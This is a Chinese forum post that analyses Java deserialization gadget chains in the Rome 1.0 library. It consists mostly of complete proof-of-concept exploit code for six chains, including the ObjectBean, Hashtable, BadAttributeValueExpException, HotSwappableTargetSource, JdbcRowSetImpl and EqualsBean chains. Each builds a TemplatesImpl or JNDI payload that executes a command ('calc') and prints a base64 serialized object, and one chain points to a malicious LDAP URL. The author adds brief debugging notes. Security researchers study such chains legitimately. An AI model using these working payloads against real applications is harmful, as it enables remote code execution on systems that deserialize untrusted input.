ToB企服应用市场:ToB评测及商务社交产业平台

标题: Rome反序列化链分析 [打印本页]

---

作者: 去皮卡多    时间: 2024-5-16 20:27
标题: Rome反序列化链分析
环境搭建

1. <dependencies>
2.     <dependency>
3.       <groupId>junit</groupId>
4.       <artifactId>junit</artifactId>
5.       <version>4.11</version>
6.       <scope>test</scope>
7.     </dependency>
8.     <dependency>
9.       <groupId>rome</groupId>
10.       <artifactId>rome</artifactId>
11.       <version>1.0</version>
12.     </dependency>
13.     <dependency>
14.       <groupId>org.javassist</groupId>
15.       <artifactId>javassist</artifactId>
16.       <version>3.28.0-GA</version>
17.     </dependency>
18.   </dependencies>

复制代码

ObjectBean链

先看看调用栈：

1. * TemplatesImpl.getOutputProperties()
2. * ToStringBean.toString(String)
3. * ToStringBean.toString()
4. * EqualsBean.beanHashCode()
5. * EqualsBean.hashCode()
6. * HashMap<K,V>.hash(Object)
7. * HashMap<K,V>.readObject(ObjectInputStream)

复制代码

先给出poc，然后一步步调试分析

1. package org.example;
3. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
4. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
5. import com.sun.syndication.feed.impl.ObjectBean;
6. import com.sun.syndication.feed.impl.ToStringBean;
7. import javassist.*;
9. import javax.xml.transform.Templates;
10. import java.io.*;
11. import java.lang.reflect.Field;
12. import java.util.Base64;
13. import java.util.HashMap;
14. import java.util.Map;
16. public class Main {
17.     public static ByteArrayOutputStream unSer(Map hashMap) throws IOException, ClassNotFoundException {
18.         // 序列化
19.         ByteArrayOutputStream bos = new ByteArrayOutputStream();
20.         ObjectOutputStream oos = new ObjectOutputStream(bos);
21.         oos.writeObject(hashMap);
22.         // 反序列化
23.         ByteArrayInputStream bis = new ByteArrayInputStream(bos.toByteArray());
24.         ObjectInputStream ois = new ObjectInputStream(bis);
25.         ois.readObject();
26.         ois.close();
27.         return bos;
28.     }
29.     public static void Base64Encode(ByteArrayOutputStream bos){
30.         byte[] bytes = Base64.getEncoder().encode(bos.toByteArray());
31.         String s = new String(bytes);
32.         System.out.println(s);
33.         System.out.println(s.length());
34.     }
35.     public static void setFieldValue(Object obj, String fieldName, Object value) throws NoSuchFieldException, IllegalAccessException {
36.         Field f = obj.getClass().getDeclaredField(fieldName);
37.         f.setAccessible(true);
38.         f.set(obj, value);
39.     }
40.     public static void main(String[] args) throws CannotCompileException, NotFoundException, IOException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException {
41.         ClassPool pool = ClassPool.getDefault();
42.         pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
43.         CtClass ct = pool.makeClass("Cat");
44.         String cmd = "java.lang.Runtime.getRuntime().exec("calc");";
45.         ct.makeClassInitializer().insertBefore(cmd);
46.         String randomClassName = "EvilCat" + System.nanoTime();
47.         ct.setName(randomClassName);
48.         ct.setSuperclass(pool.get(AbstractTranslet.class.getName()));
49.         byte[][] bytes = new byte[][]{ct.toBytecode()};
50.         TemplatesImpl templatesImpl = new TemplatesImpl();
51.         setFieldValue(templatesImpl, "_bytecodes", bytes);
52.         setFieldValue(templatesImpl, "_name", "a");
53.         setFieldValue(templatesImpl, "_tfactory", null);
54.         ToStringBean toStringBean = new ToStringBean(Templates.class, templatesImpl);
55.         ObjectBean objectBean = new ObjectBean(ToStringBean.class, toStringBean);
56.         Map hashMap = new HashMap();
57.         hashMap.put(objectBean, "x");
58.         setFieldValue(objectBean, "_cloneableBean",null);
59.         setFieldValue(objectBean,"_toStringBean", null);
60.         ByteArrayOutputStream bos = unSer(hashMap);
61.         Base64Encode(bos);
62.     }
63. }

复制代码

在readObject处打个断点开始调试

进入HashMap的readObject

跟进hash方法

跟进hashCode方法

来到ObjectBean的hashCode方法，_equalsBean是EqualsBean的实例对象，跟进它的beanHashCode方法

_obj是ToStringBean的实例对象，跟进它的toString方法

进入另一个有参方法toString

this._beanclass为javax.xml.transform.Templates,将它的名字传入了getPropertyDescriptors，跟进

这里就很怪了，看其它博主的调试文章说是像是fastjson的任意get，set方法调用，在hashMap进行put时会进入getPDs方法，但我经过实际调试确是没法进入这个方法，我跟进的是进入invoke，_obj是我们的TemplatesImpl的实例对象

进入invoke后，往后会调用到NativeMethodAccessorImpl的invoke方法，这里的method是Templates的getOutputProperties方法，var1是我们的TemplatesImpl对象

进入invoke0，就会调用TemplatesImpl的getOutputProperties方法，但是为什么不会弹盘算器，这是一个谜，到反序列化的时候，追踪到调用toString的时候才会触发，有师傅知道为什么，贫苦在批评区告诉一下wuwuwu
HashTable链

这条链子实际上就是在HashMap被ban的情况下进行反序列化，由于最终目的始终都是调用hashcode函数，而HashTbale中刚好调用了hashcode，因此仍然可以触发整套流程

1. package org.example;
3. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
4. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
5. import com.sun.syndication.feed.impl.ObjectBean;
6. import com.sun.syndication.feed.impl.ToStringBean;
7. import javassist.*;
9. import javax.xml.transform.Templates;
10. import java.io.*;
11. import java.lang.reflect.Field;
12. import java.util.Base64;
13. import java.util.HashMap;
14. import java.util.Hashtable;
15. import java.util.Map;
17. public class HashTable {
18.     public static ByteArrayOutputStream unSer(Map hashMap) throws IOException, ClassNotFoundException {
19.         // 序列化
20.         ByteArrayOutputStream bos = new ByteArrayOutputStream();
21.         ObjectOutputStream oos = new ObjectOutputStream(bos);
22.         oos.writeObject(hashMap);
23.         // 反序列化
24.         ByteArrayInputStream bis = new ByteArrayInputStream(bos.toByteArray());
25.         ObjectInputStream ois = new ObjectInputStream(bis);
26.         ois.readObject();
27.         ois.close();
28.         return bos;
29.     }
30.     public static void Base64Encode(ByteArrayOutputStream bos){
31.         byte[] bytes = Base64.getEncoder().encode(bos.toByteArray());
32.         String s = new String(bytes);
33.         System.out.println(s);
34.         System.out.println(s.length());
35.     }
36.     public static void setFieldValue(Object obj, String fieldName, Object value) throws NoSuchFieldException, IllegalAccessException {
37.         Field f = obj.getClass().getDeclaredField(fieldName);
38.         f.setAccessible(true);
39.         f.set(obj, value);
40.     }
41.     public static void main(String[] args) throws CannotCompileException, NotFoundException, IOException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException {
42.         ClassPool pool = ClassPool.getDefault();
43.         pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
44.         CtClass ct = pool.makeClass("Cat");
45.         String cmd = "java.lang.Runtime.getRuntime().exec("calc");";
46.         ct.makeClassInitializer().insertBefore(cmd);
47.         String randomClassName = "EvilCat" + System.nanoTime();
48.         ct.setName(randomClassName);
49.         ct.setSuperclass(pool.get(AbstractTranslet.class.getName()));
50.         byte[][] bytes = new byte[][]{ct.toBytecode()};
51.         TemplatesImpl templatesImpl = new TemplatesImpl();
52.         setFieldValue(templatesImpl, "_bytecodes", bytes);
53.         setFieldValue(templatesImpl, "_name", "a");
54.         setFieldValue(templatesImpl, "_tfactory", null);
55.         ToStringBean toStringBean = new ToStringBean(Templates.class, templatesImpl);
56.         ObjectBean objectBean = new ObjectBean(ToStringBean.class, toStringBean);
57.         Map hashTable = new Hashtable();
58.         hashTable.put(objectBean, "x");
59.         setFieldValue(objectBean, "_cloneableBean",null);
60.         setFieldValue(objectBean,"_toStringBean", null);
61.         ByteArrayOutputStream bos = unSer(hashTable);
62.         Base64Encode(bos);
63.     }
64. }

复制代码

链子流程跟上一个一样
BadAttributeValueExpException链

这个类在CC链中我们是拿来触发toString的，他的readObject方法中有toString，因此可以直接连着Rmoe链的ToStringBean，这样也是可以触发的

1. package org.example;
3. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
4. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
5. import com.sun.syndication.feed.impl.ObjectBean;
6. import com.sun.syndication.feed.impl.ToStringBean;
7. import javassist.*;
9. import javax.management.BadAttributeValueExpException;
10. import javax.xml.transform.Templates;
11. import java.io.*;
12. import java.lang.reflect.Field;
13. import java.util.Base64;
14. import java.util.Hashtable;
15. import java.util.Map;
17. public class BadAVEE {
18.     public static ByteArrayOutputStream unSer(Object obj) throws IOException, ClassNotFoundException {
19.         // 序列化
20.         ByteArrayOutputStream bos = new ByteArrayOutputStream();
21.         ObjectOutputStream oos = new ObjectOutputStream(bos);
22.         oos.writeObject(obj);
23.         // 反序列化
24.         ByteArrayInputStream bis = new ByteArrayInputStream(bos.toByteArray());
25.         ObjectInputStream ois = new ObjectInputStream(bis);
26.         ois.readObject();
27.         ois.close();
28.         return bos;
29.     }
30.     public static void Base64Encode(ByteArrayOutputStream bos){
31.         byte[] bytes = Base64.getEncoder().encode(bos.toByteArray());
32.         String s = new String(bytes);
33.         System.out.println(s);
34.         System.out.println(s.length());
35.     }
36.     public static void setFieldValue(Object obj, String fieldName, Object value) throws NoSuchFieldException, IllegalAccessException {
37.         Field f = obj.getClass().getDeclaredField(fieldName);
38.         f.setAccessible(true);
39.         f.set(obj, value);
40.     }
41.     public static void main(String[] args) throws CannotCompileException, NotFoundException, IOException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException {
42.         ClassPool pool = ClassPool.getDefault();
43.         pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
44.         CtClass ct = pool.makeClass("Cat");
45.         String cmd = "java.lang.Runtime.getRuntime().exec("calc");";
46.         ct.makeClassInitializer().insertBefore(cmd);
47.         String randomClassName = "EvilCat" + System.nanoTime();
48.         ct.setName(randomClassName);
49.         ct.setSuperclass(pool.get(AbstractTranslet.class.getName()));
50.         byte[][] bytes = new byte[][]{ct.toBytecode()};
51.         TemplatesImpl templatesImpl = new TemplatesImpl();
52.         setFieldValue(templatesImpl, "_bytecodes", bytes);
53.         setFieldValue(templatesImpl, "_name", "a");
54.         setFieldValue(templatesImpl, "_tfactory", null);
55.         ToStringBean toStringBean = new ToStringBean(Templates.class, templatesImpl);
56.         BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(123);
57.         setFieldValue(badAttributeValueExpException, "val", toStringBean);
58.         ByteArrayOutputStream bos = unSer(badAttributeValueExpException);
59.         Base64Encode(bos);
60.     }
61. }

复制代码

由于不需要hashCode了，以是hashMap和objectbean也就不需要了，直接上ToStringBean，调试流程就不写了，由于没啥太大改动
HotSwappableTargetSource链

这个类有equals方法，可以触发Xstring的toString，那么也就可以接上Rome的后半段，这里留意加个org.springframework.aop.target.HotSwappableTargetSource的依赖

1. package org.example;
3. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
4. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
5. import com.sun.org.apache.xpath.internal.objects.XString;
6. import com.sun.syndication.feed.impl.ToStringBean;
7. import javassist.*;
8. import org.springframework.aop.target.HotSwappableTargetSource;
9. import javax.xml.transform.Templates;
10. import java.io.*;
11. import java.lang.reflect.Field;
12. import java.util.Base64;
13. import java.util.HashMap;
14. import java.util.Map;
16. public class HotSwapp {
17.     public static ByteArrayOutputStream unSer(Object obj) throws IOException, ClassNotFoundException {
18.         // 序列化
19.         ByteArrayOutputStream bos = new ByteArrayOutputStream();
20.         ObjectOutputStream oos = new ObjectOutputStream(bos);
21.         oos.writeObject(obj);
22.         // 反序列化
23.         ByteArrayInputStream bis = new ByteArrayInputStream(bos.toByteArray());
24.         ObjectInputStream ois = new ObjectInputStream(bis);
25.         ois.readObject();
26.         ois.close();
27.         return bos;
28.     }
29.     public static void Base64Encode(ByteArrayOutputStream bos){
30.         byte[] bytes = Base64.getEncoder().encode(bos.toByteArray());
31.         String s = new String(bytes);
32.         System.out.println(s);
33.         System.out.println(s.length());
34.     }
35.     public static void setFieldValue(Object obj, String fieldName, Object value) throws NoSuchFieldException, IllegalAccessException {
36.         Field f = obj.getClass().getDeclaredField(fieldName);
37.         f.setAccessible(true);
38.         f.set(obj, value);
39.     }
40.     public static void main(String[] args) throws CannotCompileException, NotFoundException, IOException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException {
41.         ClassPool pool = ClassPool.getDefault();
42.         pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
43.         CtClass ct = pool.makeClass("Cat");
44.         String cmd = "java.lang.Runtime.getRuntime().exec("calc");";
45.         ct.makeClassInitializer().insertBefore(cmd);
46.         String randomClassName = "EvilCat" + System.nanoTime();
47.         ct.setName(randomClassName);
48.         ct.setSuperclass(pool.get(AbstractTranslet.class.getName()));
49.         byte[][] bytes = new byte[][]{ct.toBytecode()};
50.         TemplatesImpl templatesImpl = new TemplatesImpl();
51.         setFieldValue(templatesImpl, "_bytecodes", bytes);
52.         setFieldValue(templatesImpl, "_name", "a");
53.         setFieldValue(templatesImpl, "_tfactory", null);
54.         ToStringBean toStringBean = new ToStringBean(Templates.class, templatesImpl);
55.         HotSwappableTargetSource h1 = new HotSwappableTargetSource(new XString("123"));
56.         HotSwappableTargetSource h2 = new HotSwappableTargetSource(toStringBean);
57.         HashMap<Object, Object> hashMap = new HashMap();
58.         hashMap.put(h2, h2);
59.         hashMap.put(h1, h1);
60.         ByteArrayOutputStream bos = unSer(hashMap);
61.         Base64Encode(bos);
62.     }
63. }

复制代码

HashMap中的putval会调用equals方法，触发HotSwappableTargetSource的equals方法

左边的target是put进去的h1，右边的target是put进去的h2，这样就会调用XString的equals方法，触发toStringBean的toString方法，链子闭合
JdbcRowSetImpl链

这个类的入口点是在一个get方法上JdbcRowSetImpl.getDatabaseMetaData(),而rome链中又可以调用任意get方法，那实在也就和TempaltesImpl链思绪是一样的，只是在不能使用TempaltesImpl时可以进行替换，这个类在Fastjson中很常见，用于JDNI注入，那么这样也是一样的进行JNDI注入，以是得留意jdk版本，不能高于jdk191，启动一个恶意LDAP服务

1. package org.example;
3. import com.sun.rowset.JdbcRowSetImpl;
4. import com.sun.syndication.feed.impl.EqualsBean;
5. import com.sun.syndication.feed.impl.ToStringBean;
6. import javassist.*;
8. import java.io.*;
9. import java.lang.reflect.Field;
10. import java.sql.SQLException;
11. import java.util.Base64;
12. import java.util.HashMap;
14. public class Jdbc {
15.     public static ByteArrayOutputStream unSer(Object obj) throws IOException, ClassNotFoundException {
16.         // 序列化
17.         ByteArrayOutputStream bos = new ByteArrayOutputStream();
18.         ObjectOutputStream oos = new ObjectOutputStream(bos);
19.         oos.writeObject(obj);
20.         // 反序列化
21.         ByteArrayInputStream bis = new ByteArrayInputStream(bos.toByteArray());
22.         ObjectInputStream ois = new ObjectInputStream(bis);
23.         ois.readObject();
24.         ois.close();
25.         return bos;
26.     }
27.     public static void Base64Encode(ByteArrayOutputStream bos){
28.         byte[] bytes = Base64.getEncoder().encode(bos.toByteArray());
29.         String s = new String(bytes);
30.         System.out.println(s);
31.         System.out.println(s.length());
32.     }
33.     public static void setFieldValue(Object obj, String fieldName, Object value) throws NoSuchFieldException, IllegalAccessException {
34.         Field f = obj.getClass().getDeclaredField(fieldName);
35.         f.setAccessible(true);
36.         f.set(obj, value);
37.     }
38.     public static void main(String[] args) throws CannotCompileException, NotFoundException, IOException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException, SQLException {
39.         JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
40.         String url = "ldap://127.0.0.1:1099/evil";
41.         jdbcRowSet.setDataSourceName(url);
42.         ToStringBean toStringBean=new ToStringBean(JdbcRowSetImpl.class,jdbcRowSet);
43.         EqualsBean equalsBean=new EqualsBean(ToStringBean.class,toStringBean);
44.         HashMap<Object, Object> map = new HashMap<>();
45.         map.put(equalsBean,"xxxxx");
46.         ByteArrayOutputStream bos = unSer(map);
47.         Base64Encode(bos);
48.     }
49. }

复制代码

EqualsBean链

通过HashSet来触发EqualsBean的equals，调用到getter，任意get方法调用触发TemplatesImpl

1. package org.example;
3. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
4. import com.sun.syndication.feed.impl.EqualsBean;
5. import javassist.ClassPool;
6. import javassist.CtClass;
7. import javassist.CtConstructor;
9. import javax.xml.transform.Templates;
10. import java.io.ByteArrayInputStream;
11. import java.io.ByteArrayOutputStream;
12. import java.io.ObjectInputStream;
13. import java.io.ObjectOutputStream;
14. import java.lang.reflect.Field;
15. import java.util.*;
17. /**
18. * Hello world!
19. *
20. */
21. public class App
22. {
23.     private static void setFieldValue(Object obj, String field, Object arg) throws Exception{
24.         Field f = obj.getClass().getDeclaredField(field);
25.         f.setAccessible(true);
26.         f.set(obj, arg);
27.     }
28.     public static void main( String[] args )
29.     {
30.         try {
31.             ClassPool pool = ClassPool.getDefault();
32.             CtClass ctClass = pool.makeClass("i");
33.             CtClass superClass = pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet");
34.             ctClass.setSuperclass(superClass);
35.             CtConstructor constructor = ctClass.makeClassInitializer();
36.             constructor.setBody("Runtime.getRuntime().exec("calc");");
37.             byte[] bytes = ctClass.toBytecode();
39.             TemplatesImpl templatesImpl = new TemplatesImpl();
40.             setFieldValue(templatesImpl, "_bytecodes", new byte[][]{bytes});
41.             setFieldValue(templatesImpl, "_name", "a");
42.             setFieldValue(templatesImpl, "_tfactory", null);
43.             EqualsBean bean = new EqualsBean(String.class, "s");
45.             HashMap map1 = new HashMap();
46.             HashMap map2 = new HashMap();
47.             map1.put("yy", bean);
48.             map1.put("zZ", templatesImpl);
49.             map2.put("zZ", bean);
50.             map2.put("yy", templatesImpl);
51.             HashSet table = new HashSet();
52.             table.add(map1);
53.             table.add(map2);
54.             //table.put(map1, "1");
55.             //table.put(map2, "2");
56.             setFieldValue(bean, "_beanClass", Templates.class);
57.             setFieldValue(bean, "_obj", templatesImpl);
58.             unSerial(table);
59.         } catch (Exception e) {
60.             e.printStackTrace();
61.         }
62.     }
63.     private static ByteArrayOutputStream unSerial(Object hashMap) throws Exception{
64.         ByteArrayOutputStream bs = new ByteArrayOutputStream();
65.         ObjectOutputStream out = new ObjectOutputStream(bs);
66.         out.writeObject(hashMap);
67.         ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bs.toByteArray()));
68.         in.readObject();
69.         in.close();
70.         return bs;
71.     }
72.     private static void Base64Encode(ByteArrayOutputStream bs){
73.         byte[] encode = Base64.getEncoder().encode(bs.toByteArray());
74.         String s = new String(encode);
75.         System.out.println(s);
76.         System.out.println(s.length());
77.     }
78. }

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

---

欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)

Powered by Discuz! X3.4